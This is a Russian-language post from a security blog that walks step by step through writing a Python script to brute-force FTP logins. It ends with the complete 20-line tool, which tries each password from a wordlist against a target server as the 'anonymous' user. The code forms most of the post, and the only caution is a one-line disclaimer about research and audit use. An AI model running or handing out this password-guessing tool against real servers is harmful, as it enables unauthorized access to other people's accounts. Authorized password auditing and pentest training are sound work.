Information Security Squad

stay tune stay secure

  • Windows
  • Linux
  • Tools
  • Hack Shop
  • How To
  • Review
  • Feedback | Donate
  • IT IS GOOD
  • Home
  • 2020
  • Сентябрь
  • 23
  • 🐍 Инструкция и скрипт на Python по брутфорсу FTP

🐍 Инструкция и скрипт на Python по брутфорсу FTP

cryptoparty - Мануал
23.09.2020 No Comments
bruteforce ftp Kali linux pentest python
Это руководство по брутфорсу FTP позволит вам создать свой собственный простой инструмент прямого перебора паролей FTP на  языке Python.
Полный код состоит всего из 20 строк, и инструмент достаточно прост.

Создайте новый файл Python

Сначала создайте новый файл Python и сохраните его, это позволит вам быстрее редактировать и перемещаться по этому руководству.

Импортируйте FTPlib

FTPlib – это стандартная библиотека, используйте ее.

Запишите следующий фрагмент кода в свой файл Python.

from ftplib import FTP

Список паролей

Инструмент брута должен использовать список паролей, ведь мы не хотим вводить пароли один за другим :-).

Большие списки паролей для брутфорса | скачать бесплатно

🦴 Ahadu — Генератор списка паролей

Создайте строковое значение, которое позволит вам указать местоположение вашего password_list.

Затем мы добавим имя пользователя по умолчанию, которое мы собираемся использовать, и нам нужно будет указать целевую строку.

password_list = "my_password_list.txt"
username = "anonymous"
target = "ftp.kakoitosite.ru"

Цикл

Определите процесс, назовем его start, мы должны подготовить список, который будет содержать password_list, и нам нужно написать некоторый код, который загрузит список в созданный нами инструмент брута FTP на Python.

Добавьте следующую строку кода:

def start():
    setx = []
    f = open(password_list)
    setx = f.readlines()

Продолжаем добавлять цикл и шаги входа в систему:

for password in setx: 
        password = password.strip()
        try: 
            ftp = FTP(target)
            ftp.login(user=username, passwd = password)
            print("Success:",str(password))
            break
        except Exception as e: 
            print("Fail:",str(e),"  [X]->  ",password)

Запуск

Последний шаг, который мы сделаем, – это добавим start() в конец кода Python.

start()

Конечный результат

from ftplib import FTP
#options
password_list = "my_password_list.txt"
username = "anonymous"
target = "ftp.kakoitosite.ru"
 
def start():
    setx = []
    f = open(password_list)
    setx = f.readlines()
    for password in setx: 
        password = password.strip()
        try: 
            ftp = FTP(target)
            ftp.login(user=username, passwd = password)
            print("Success:",str(password))
            break
        except Exception as e: 
            print("Fail:",str(e),"  [X]->  ",password)
start()

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

Навигация по записям

Зачем нанимать SEO-компанию? – Почему это важно для бизнеса
🕵️‍♂️ Как создать обратный шелл

Related Articles

devops DevSecOps docker

🐳 Как запускать команды внутри контейнера Docker?

cryptoparty - Мануал
07.04.2021 No Comments
devops DevSecOps docker

🐳 Как узнать IP-адрес Docker контейнера

cryptoparty - Мануал
02.04.2021 No Comments
fail2ban linux SFTP ssh ubuntu

🕵️ Как установить и настроить Fail2ban на Ubuntu 20.04

cryptoparty - Мануал
01.04.2021 2 комментария

Добавить комментарий Отменить ответ

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Рубрики

  • Аудит ИБ (40)
  • Вакансии (9)
  • Закрытие уязвимостей (98)
  • Книги (25)
  • Мануал (1 832)
  • Медиа (66)
  • Мероприятия (36)
  • Мошенники (22)
  • Обзоры (675)
  • Обход запретов (31)
  • Опросы (3)
  • Скрипты (104)
  • Статьи (272)
  • Философия (64)
  • Юмор (17)

Метки

android Apache Arch Linux Astra Linux backup bash bruteforce CentOS debian devops DNS docker Fedora firewall FreeBSD Kali linux Kubernetes linux Linux Mint MacOS malware network Nginx nmap OpenSSL Password pentest powershell proxy python RHEL scanner ssh SSL TLS tor ubuntu unix VPN web security windows wordpress САВЗ резервное копирование шифрование

Наш Telegram

Социальные сети

Follow Us on VKFollow Us on Cuttings.meFollow Us on Wordpress

Hack shop

  • 🤖 Игрушка / брелок Android
    Оценка 5.00 из 5
    ₽ 349.00 ₽ 219.00
  • Чехол Iphone X Linux tux Пингвин
    Оценка 5.00 из 5
    ₽ 500.00 ₽ 400.00
  • 🐱 Набор стикеров наклеек IT GEEK
    Оценка 5.00 из 5
    ₽ 250.00
  • BadUSB Beetle Bas USB Микроконтроллер
    Оценка 5.00 из 5
    ₽ 2,500.00 ₽ 2,000.00
  • 🤖 Брелок Робот
    Оценка 5.00 из 5
    ₽ 250.00 ₽ 200.00

Поделиться

Facebooktwitterredditpinterestlinkedinmail

Anything in here will be replaced on browsers that support the canvas element

  • linux
  • ubuntu
  • windows
  • Kali linux
  • debian
  • CentOS
  • web security
  • RHEL
  • Fedora
  • Arch Linux
  • ssh
  • unix
  • devops
  • шифрование
  • SSL
  • MacOS
  • Astra Linux
  • Linux Mint
  • VPN
  • Password
  • docker
  • firewall
  • pentest
  • malware
  • proxy
  • python
  • САВЗ
  • Apache
  • FreeBSD
  • android

RSS Information Security Squad

  • 🕵️ Как пользоваться сканером уязвимостей Nessus? 09.04.2021
    Как пользоваться сканером уязвимостей Nessus Это статья для новичков, которые хотят получить стартовые знания по сканированию на уязвимости. Подробно и... The post 🕵️ Как пользоваться сканером уязвимостей Nessus? first appeared on Information Security Squad.
  • 🖧 Безопасность беспроводной сети Wi-fi 07.04.2021
    Как обеспечить безопаcность Wi-fi? Сегодня беспроводные технологии широко используются в корпоративных офисах, на предприятиях, государственных и образовательных учреждениях. Существует множество... The post 🖧 Безопасность беспроводной сети Wi-fi first appeared on Information Security Squad.
  • 🐳 Как запускать команды внутри контейнера Docker? 07.04.2021
    Запускать команды внутри контейнера проще, чем вы думаете. Контейнер Docker – это изолированная среда, которая обычно содержит одно приложение со... The post 🐳 Как запускать команды внутри контейнера Docker? first appeared on Information Security Squad.
  • Разновидности хостинга: как сделать выбор? 06.04.2021
    Провайдеры часто рекламируют услуги хостинга. Многие люди не обращают внимания на такое предложение, потому что не знают о ней. Чтобы... The post Разновидности хостинга: как сделать выбор? first appeared on Information Security Squad.
  • Сервисы, способные найти чей-либо email 06.04.2021
    Как найти электронный адрес например владельца сайта? Или как найти email определенного человека? В этом обзоре постараюсь показать онлайн сервисы,... The post Сервисы, способные найти чей-либо email first appeared on Information Security Squad.
Flag Counter

Корзина

Свежие комментарии

  • Рома к записи Whatsapp Automation для отправки и получения сообщений
  • vitya к записи 🕵️ Как пользоваться сканером уязвимостей Nessus?
  • cryptoparty к записи ✗ Как узнать чужой IP ( кого угодно) отправив ему ссылку | Лучшие Ip грабберы в 2019✗
  • Равшан к записи ✗ Как узнать чужой IP ( кого угодно) отправив ему ссылку | Лучшие Ip грабберы в 2019✗
  • cryptoparty к записи Онлайн брутфорс паролей с Hydra-GTK

Hack shop

  • 🤖 Игрушка / брелок Android
    Оценка 5.00 из 5
    ₽ 349.00 ₽ 219.00
  • Чехол Iphone X Linux tux Пингвин
    Оценка 5.00 из 5
    ₽ 500.00 ₽ 400.00
  • 🐱 Набор стикеров наклеек IT GEEK
    Оценка 5.00 из 5
    ₽ 250.00
  • BadUSB Beetle Bas USB Микроконтроллер
    Оценка 5.00 из 5
    ₽ 2,500.00 ₽ 2,000.00
  • 🤖 Брелок Робот
    Оценка 5.00 из 5
    ₽ 250.00 ₽ 200.00

Свежие записи

  • 🕵️ Как пользоваться сканером уязвимостей Nessus?
  • 🖧 Безопасность беспроводной сети Wi-fi
  • 🐳 Как запускать команды внутри контейнера Docker?
  • Разновидности хостинга: как сделать выбор?
  • Сервисы, способные найти чей-либо email